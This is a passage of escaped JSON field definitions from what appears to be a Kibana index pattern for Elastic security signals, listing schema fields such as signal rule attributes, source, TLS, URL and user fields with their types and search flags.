"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\